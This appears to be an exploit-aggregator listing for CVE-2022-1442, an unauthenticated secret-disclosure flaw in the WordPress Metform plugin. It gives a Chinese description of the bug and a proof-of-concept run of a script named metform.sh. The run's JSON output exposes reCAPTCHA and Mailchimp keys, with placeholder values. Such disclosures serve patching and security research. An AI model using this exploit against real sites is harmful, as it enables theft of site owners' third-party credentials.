Sploitus

Exploit for CVE-2022-1442

kitploit · 2026-08-24

Exploit Code

MARKDOWN45 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-RANDOMROBBIEBF-CVE-2022-1442
# CVE-2022-1442

WordPress 插件 Metform <= 2.1.3 - 不恰当的访问控制导致未认证的敏感信息泄露

# 描述

由于 ~/core/forms/action.php 文件中存在不恰当的访问控制,该插件容易受到敏感信息泄露攻击,未认证的攻击者可以利用该漏洞查看所有集成的第三方 API 的密钥和机密信息,例如 PayPal、Stripe、Mailchimp、Hubspot、HelpScout、reCAPTCHA 等。

## POC

root@kitploit:~
    
    
     bash metform.sh http://wordpress.lan
    {
      "form_title": "New Form # 1691056894",
      "success_message": "Thank you! Form submitted successfully.",
      "capture_user_browser_data": "1",
      "store_entries": "1",
      "entry_title": "Entry # [mf_id]",
      "count_views": "1",
      "redirect_to": "",
      "user_email_subject": "",
      "user_email_from": "",
      "user_email_reply_to": "",
      "user_email_body": "",
      "admin_email_subject": "",
      "admin_email_to": "",
      "admin_email_from": "",
      "admin_email_reply_to": "",
      "admin_email_body": "",
      "mf_mailchimp_list_id": "",
      "mf_slack_webhook": "",
      "mf_recaptcha_version": "recaptcha-v2",
      "mf_recaptcha_site_key": "sfsdffd",
      "mf_recaptcha_secret_key": "sfddsf",
      "mf_recaptcha_site_key_v3": "",
      "mf_recaptcha_secret_key_v3": "",
      "mf_mailchimp_api_key": "asdadasdsaddas",
      "input_names": "Example: [mf-inputname]",
      "ckit_opt": [],
      "aweber_opt": [],
      "mp_opt": []
    }